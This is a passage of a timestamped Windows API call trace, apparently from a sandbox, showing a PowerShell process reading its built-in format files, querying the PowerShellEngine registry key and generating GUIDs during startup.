	[0749.393] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.393] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.395] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.395] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0749.395] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0750.544] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0750.544] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0750.545] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0750.546] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0750.546] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0xf37, lpOverlapped=0x0) returned 1
	[0750.546] ReadFile (in: hFile=0x30c, lpBuffer=0x3341b17, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3341b17*, lpNumberOfBytesRead=0x18d178*=0x0, lpOverlapped=0x0) returned 1
	[0750.546] ReadFile (in: hFile=0x30c, lpBuffer=0x3342478, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x3342478*, lpNumberOfBytesRead=0x18d178*=0x0, lpOverlapped=0x0) returned 1
	[0750.547] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d208 | out: phkResult=0x18d208*=0x30c) returned 0x0
	[0750.547] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d18c, lpData=0x0, lpcbData=0x18d188*=0x0 | out: lpType=0x18d18c*=0x1, lpData=0x0, lpcbData=0x18d188*=0x56) returned 0x0
	[0750.547] CoTaskMemAlloc (cb=0x5a) returned 0x1b941920
	[0750.547] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d15c, lpData=0x1b941920, lpcbData=0x18d158*=0x56 | out: lpType=0x18d15c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18d158*=0x56) returned 0x0
	[0750.547] CoTaskMemFree (pv=0x1b941920) 
	[0750.547] RegCloseKey (hKey=0x30c) returned 0x0
	[0750.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0750.548] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0750.552] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x705bf1df, Data2=0x9be7, Data3=0x42b7, Data4=([0]=0xb3, [1]=0x44, [2]=0x81, [3]=0x5e, [4]=0x92, [5]=0x32, [6]=0xe6, [7]=0x5))) returned 0x0
	[0750.552] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x1cc900e8, Data2=0xb821, Data3=0x4899, Data4=([0]=0xb5, [1]=0xd7, [2]=0xf8, [3]=0x8b, [4]=0x62, [5]=0xe2, [6]=0x69, [7]=0x64))) returned 0x0
	[0750.562] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x188d2eb6, Data2=0x6d1c, Data3=0x493f, Data4=([0]=0x93, [1]=0x80, [2]=0x38, [3]=0x92, [4]=0xb5, [5]=0x1c, [6]=0x4, [7]=0xdc))) returned 0x0
	[0750.562] VirtualQuery (in: lpAddress=0x18b440, lpBuffer=0x18c300, dwLength=0x30 | out: lpBuffer=0x18c300*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0750.563] VirtualQuery (in: lpAddress=0x18b4d0, lpBuffer=0x18c390, dwLength=0x30 | out: lpBuffer=0x18c390*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0750.568] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x3c673869, Data2=0x4d49, Data3=0x4689, Data4=([0]=0xa5, [1]=0x3c, [2]=0x9b, [3]=0x9e, [4]=0x81, [5]=0x67, [6]=0x60, [7]=0x1c))) returned 0x0
	[0751.886] VirtualQuery (in: lpAddress=0x18bc40, lpBuffer=0x18cb00, dwLength=0x30 | out: lpBuffer=0x18cb00*(BaseAddress=0x18b000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0751.892] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x51431216, Data2=0x4342, Data3=0x41e0, Data4=([0]=0xbe, [1]=0x38, [2]=0xe1, [3]=0x65, [4]=0xec, [5]=0x55, [6]=0x94, [7]=0x37))) returned 0x0
	[0751.895] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x1b37daa3, Data2=0x764, Data3=0x433b, Data4=([0]=0x9e, [1]=0xd9, [2]=0x58, [3]=0xbf, [4]=0x83, [5]=0xdf, [6]=0x9c, [7]=0x69))) returned 0x0
	[0751.898] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xd85c620c, Data2=0x68b1, Data3=0x447d, Data4=([0]=0xa2, [1]=0x41, [2]=0x65, [3]=0xe2, [4]=0x76, [5]=0x7d, [6]=0x82, [7]=0xbd))) returned 0x0
	[0751.899] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x9099da0d, Data2=0x74c2, Data3=0x479c, Data4=([0]=0x94, [1]=0xd, [2]=0x61, [3]=0xce, [4]=0x19, [5]=0xaa, [6]=0x25, [7]=0xf8))) returned 0x0
	[0751.899] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xaa801551, Data2=0x4416, Data3=0x4f5b, Data4=([0]=0x9a, [1]=0x6a, [2]=0x3e, [3]=0x34, [4]=0xc3, [5]=0x93, [6]=0x96, [7]=0x46))) returned 0x0
	[0751.899] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xa550a49a, Data2=0x1386, Data3=0x45e6, Data4=([0]=0x98, [1]=0xfa, [2]=0xe9, [3]=0xb7, [4]=0xc2, [5]=0xdf, [6]=0xcd, [7]=0x42))) returned 0x0
	[0751.899] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xc72a6c6e, Data2=0xc84c, Data3=0x4e9b, Data4=([0]=0x8e, [1]=0x9e, [2]=0xe7, [3]=0xc0, [4]=0x1c, [5]=0xd5, [6]=0x79, [7]=0x25))) returned 0x0
	[0751.899] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x76b7b099, Data2=0xe1f3, Data3=0x40f5, Data4=([0]=0xa7, [1]=0x76, [2]=0x97, [3]=0x4b, [4]=0xad, [5]=0x40, [6]=0xef, [7]=0x40))) returned 0x0
	[0751.900] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xde79818a, Data2=0x5ef, Data3=0x4c76, Data4=([0]=0x9d, [1]=0x18, [2]=0x95, [3]=0x58, [4]=0x8, [5]=0x6d, [6]=0x21, [7]=0x4e))) returned 0x0
	[0751.900] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xbac2cdca, Data2=0x2cbf, Data3=0x4ec5, Data4=([0]=0x86, [1]=0x7b, [2]=0x5f, [3]=0xe5, [4]=0xd3, [5]=0x71, [6]=0xc3, [7]=0x8d))) returned 0x0
	[0751.900] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xb627a1a3, Data2=0xe9bd, Data3=0x4b2e, Data4=([0]=0xb5, [1]=0x70, [2]=0xbe, [3]=0x53, [4]=0x8f, [5]=0xc1, [6]=0x9c, [7]=0xa9))) returned 0x0
	[0751.901] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xc3bd3e7, Data2=0x2984, Data3=0x4939, Data4=([0]=0x9e, [1]=0xb7, [2]=0xc3, [3]=0x86, [4]=0x77, [5]=0xa9, [6]=0xe0, [7]=0xe1))) returned 0x0
	[0751.902] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x244a0c0b, Data2=0x8c35, Data3=0x4ff0, Data4=([0]=0xa5, [1]=0x6b, [2]=0x7f, [3]=0x35, [4]=0x4, [5]=0x24, [6]=0x88, [7]=0x7d))) returned 0x0
	[0751.903] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xf067e1a7, Data2=0xda0a, Data3=0x4714, Data4=([0]=0xbd, [1]=0xbd, [2]=0xe8, [3]=0x27, [4]=0x84, [5]=0x49, [6]=0x52, [7]=0x85))) returned 0x0
	[0751.903] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x724a8336, Data2=0x4e1a, Data3=0x44bc, Data4=([0]=0xa7, [1]=0x78, [2]=0x68, [3]=0x54, [4]=0x68, [5]=0x85, [6]=0x80, [7]=0xd0))) returned 0x0
	[0751.904] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xe7a54af7, Data2=0xd0aa, Data3=0x457b, Data4=([0]=0xa6, [1]=0x6f, [2]=0x71, [3]=0xb1, [4]=0xc3, [5]=0x22, [6]=0x91, [7]=0x4e))) returned 0x0
	[0751.904] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xda042d40, Data2=0x30bc, Data3=0x4155, Data4=([0]=0xa2, [1]=0xf6, [2]=0x12, [3]=0x4, [4]=0xa8, [5]=0x47, [6]=0x94, [7]=0xc))) returned 0x0
	[0751.904] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x2dbe76a0, Data2=0xfdf3, Data3=0x405c, Data4=([0]=0xaa, [1]=0x19, [2]=0xd, [3]=0x6a, [4]=0xf1, [5]=0x20, [6]=0xc5, [7]=0x1e))) returned 0x0
	[0751.904] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x6ad19938, Data2=0x2d69, Data3=0x483b, Data4=([0]=0xa1, [1]=0xd5, [2]=0x6d, [3]=0x9b, [4]=0xe7, [5]=0xb2, [6]=0x8a, [7]=0x28))) returned 0x0
	[0751.904] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xaf53d11f, Data2=0xc145, Data3=0x438d, Data4=([0]=0xa5, [1]=0xd8, [2]=0x5b, [3]=0x10, [4]=0x4a, [5]=0x8, [6]=0xa7, [7]=0xa4))) returned 0x0
	[0751.904] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x1efd9ced, Data2=0x13b0, Data3=0x4d63, Data4=([0]=0xac, [1]=0x21, [2]=0x60, [3]=0xdb, [4]=0xe4, [5]=0x32, [6]=0x30, [7]=0xb2))) returned 0x0
	[0751.905] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x30c
	[0751.905] GetFileType (hFile=0x30c) returned 0x1
	[0751.905] SetErrorMode (uMode=0x1) returned 0x1
	[0751.905] GetFileType (hFile=0x30c) returned 0x1
	[0751.905] ReadFile (in: hFile=0x30c, lpBuffer=0x30afe78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x30afe78*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0751.906] ReadFile (in: hFile=0x30c, lpBuffer=0x30afe78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x30afe78*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0751.906] ReadFile (in: hFile=0x30c, lpBuffer=0x30afe78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x30afe78*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0751.906] ReadFile (in: hFile=0x30c, lpBuffer=0x30afe78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x30afe78*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0751.907] ReadFile (in: hFile=0x30c, lpBuffer=0x30afe78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x30afe78*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0751.907] ReadFile (in: hFile=0x30c, lpBuffer=0x30afe78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x30afe78*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0751.907] ReadFile (in: hFile=0x30c, lpBuffer=0x30afe78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x30afe78*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0751.908] ReadFile (in: hFile=0x30c, lpBuffer=0x30afe78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x30afe78*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0751.908] ReadFile (in: hFile=0x30c, lpBuffer=0x30afe78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x30afe78*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0751.909] ReadFile (in: hFile=0x30c, lpBuffer=0x30afe78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x30afe78*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0751.909] ReadFile (in: hFile=0x30c, lpBuffer=0x30afe78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x30afe78*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0751.909] ReadFile (in: hFile=0x30c, lpBuffer=0x30afe78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x30afe78*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0751.909] ReadFile (in: hFile=0x30c, lpBuffer=0x30afe78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x30afe78*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0751.910] ReadFile (in: hFile=0x30c, lpBuffer=0x30afe78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x30afe78*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0751.910] ReadFile (in: hFile=0x30c, lpBuffer=0x30afe78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x30afe78*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0751.910] ReadFile (in: hFile=0x30c, lpBuffer=0x30afe78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x30afe78*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0751.910] ReadFile (in: hFile=0x30c, lpBuffer=0x30afe78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x30afe78*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0751.911] ReadFile (in: hFile=0x30c, lpBuffer=0x30afe78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x30afe78*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0751.911] ReadFile (in: hFile=0x30c, lpBuffer=0x30afe78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x30afe78*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0751.912] ReadFile (in: hFile=0x30c, lpBuffer=0x30afe78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x30afe78*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0751.912] ReadFile (in: hFile=0x30c, lpBuffer=0x30afe78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x30afe78*, lpNumberOfBytesRead=0x18d178*=0x1000, lpOverlapped=0x0) returned 1
	[0751.912] ReadFile (in: hFile=0x30c, lpBuffer=0x30afe78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x30afe78*, lpNumberOfBytesRead=0x18d178*=0xe67, lpOverlapped=0x0) returned 1
	[0751.913] ReadFile (in: hFile=0x30c, lpBuffer=0x30af447, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x30af447*, lpNumberOfBytesRead=0x18d178*=0x0, lpOverlapped=0x0) returned 1
	[0751.913] ReadFile (in: hFile=0x30c, lpBuffer=0x30afe78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18d178, lpOverlapped=0x0 | out: lpBuffer=0x30afe78*, lpNumberOfBytesRead=0x18d178*=0x0, lpOverlapped=0x0) returned 1
	[0751.913] CloseHandle (hObject=0x30c) returned 1
	[0751.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0751.913] SetErrorMode (uMode=0x1) returned 0x1
	[0751.913] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x18d120 | out: lpFileInformation=0x18d120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0751.913] SetErrorMode (uMode=0x1) returned 0x1
	[0751.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0751.914] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x18d208 | out: phkResult=0x18d208*=0x30c) returned 0x0
	[0751.914] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d18c, lpData=0x0, lpcbData=0x18d188*=0x0 | out: lpType=0x18d18c*=0x1, lpData=0x0, lpcbData=0x18d188*=0x56) returned 0x0
	[0751.914] CoTaskMemAlloc (cb=0x5a) returned 0x1b941920
	[0751.914] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x18d15c, lpData=0x1b941920, lpcbData=0x18d158*=0x56 | out: lpType=0x18d15c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x18d158*=0x56) returned 0x0
	[0751.914] CoTaskMemFree (pv=0x1b941920) 
	[0751.917] RegCloseKey (hKey=0x30c) returned 0x0
	[0751.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18ce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0751.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x18cd00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0751.919] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x1d52f1e, Data2=0x12ab, Data3=0x4611, Data4=([0]=0xbd, [1]=0x64, [2]=0xad, [3]=0x1f, [4]=0x49, [5]=0x56, [6]=0x3d, [7]=0xc4))) returned 0x0
	[0751.919] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x359c9738, Data2=0x3d1e, Data3=0x4d82, Data4=([0]=0xab, [1]=0x7e, [2]=0x40, [3]=0x83, [4]=0x2a, [5]=0x18, [6]=0x3b, [7]=0x9))) returned 0x0
	[0751.919] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x54a7d2e4, Data2=0x64bf, Data3=0x4916, Data4=([0]=0xa9, [1]=0xc2, [2]=0x1d, [3]=0xf0, [4]=0xa6, [5]=0x66, [6]=0x3d, [7]=0x9))) returned 0x0
	[0751.919] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x4e003f5c, Data2=0x17, Data3=0x4ee1, Data4=([0]=0x89, [1]=0x17, [2]=0xe6, [3]=0x4c, [4]=0x67, [5]=0xc6, [6]=0x8e, [7]=0x69))) returned 0x0
	[0751.919] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xd79c6364, Data2=0x2f84, Data3=0x438a, Data4=([0]=0xad, [1]=0xf9, [2]=0xc7, [3]=0x52, [4]=0x4b, [5]=0xa6, [6]=0xb1, [7]=0x9))) returned 0x0
	[0751.919] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x172c5da2, Data2=0x1a2f, Data3=0x44e5, Data4=([0]=0x8f, [1]=0x6b, [2]=0xae, [3]=0x7a, [4]=0x82, [5]=0xc4, [6]=0x81, [7]=0x63))) returned 0x0
	[0751.920] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x9d1f2034, Data2=0xfdb1, Data3=0x44c7, Data4=([0]=0x85, [1]=0x9d, [2]=0x6e, [3]=0x9a, [4]=0x71, [5]=0x66, [6]=0x72, [7]=0x58))) returned 0x0
	[0751.920] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x30950276, Data2=0xaaa3, Data3=0x462a, Data4=([0]=0xb7, [1]=0xa4, [2]=0xa4, [3]=0x11, [4]=0x38, [5]=0x7a, [6]=0x8, [7]=0x29))) returned 0x0
	[0751.920] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xc9910584, Data2=0x1bd2, Data3=0x4fcf, Data4=([0]=0xa3, [1]=0x83, [2]=0x98, [3]=0x74, [4]=0xda, [5]=0x6d, [6]=0x16, [7]=0xd1))) returned 0x0
	[0751.920] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x9965d3f8, Data2=0x5602, Data3=0x41ac, Data4=([0]=0xbd, [1]=0x3, [2]=0x6b, [3]=0xf2, [4]=0xab, [5]=0xe1, [6]=0x9b, [7]=0x76))) returned 0x0
	[0751.920] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x1d86fc2, Data2=0x79eb, Data3=0x4b36, Data4=([0]=0xa6, [1]=0xc4, [2]=0x8b, [3]=0x51, [4]=0x8e, [5]=0xc1, [6]=0xc7, [7]=0x52))) returned 0x0
	[0751.920] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xce2bd2f1, Data2=0x12c, Data3=0x415f, Data4=([0]=0x97, [1]=0xd7, [2]=0x2f, [3]=0xdf, [4]=0xf6, [5]=0xf2, [6]=0xdd, [7]=0x2a))) returned 0x0
	[0751.920] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x3fc4f390, Data2=0x507b, Data3=0x4111, Data4=([0]=0xbf, [1]=0xa, [2]=0x3b, [3]=0x5a, [4]=0x2b, [5]=0xa, [6]=0x25, [7]=0x79))) returned 0x0
	[0751.920] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x67a16cd3, Data2=0xbd10, Data3=0x4211, Data4=([0]=0x93, [1]=0xa9, [2]=0x56, [3]=0xc, [4]=0xcc, [5]=0x46, [6]=0x9d, [7]=0x13))) returned 0x0
	[0751.921] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0x593e900d, Data2=0xa516, Data3=0x4495, Data4=([0]=0x9d, [1]=0x94, [2]=0x10, [3]=0x38, [4]=0x9d, [5]=0xcd, [6]=0x73, [7]=0xef))) returned 0x0
	[0751.921] CoCreateGuid (in: pguid=0x18d430 | out: pguid=0x18d430*(Data1=0xe86b8190, Data2=0xfbfc, Data3=0x4c80, Data4=([0]=0x83, [1]=0x34, [2]=0x1c, [3]=0x5b, [4]=0xc5, [5]=0x24, [6]=0xf4, [7]=0xe2))) returned 0x0
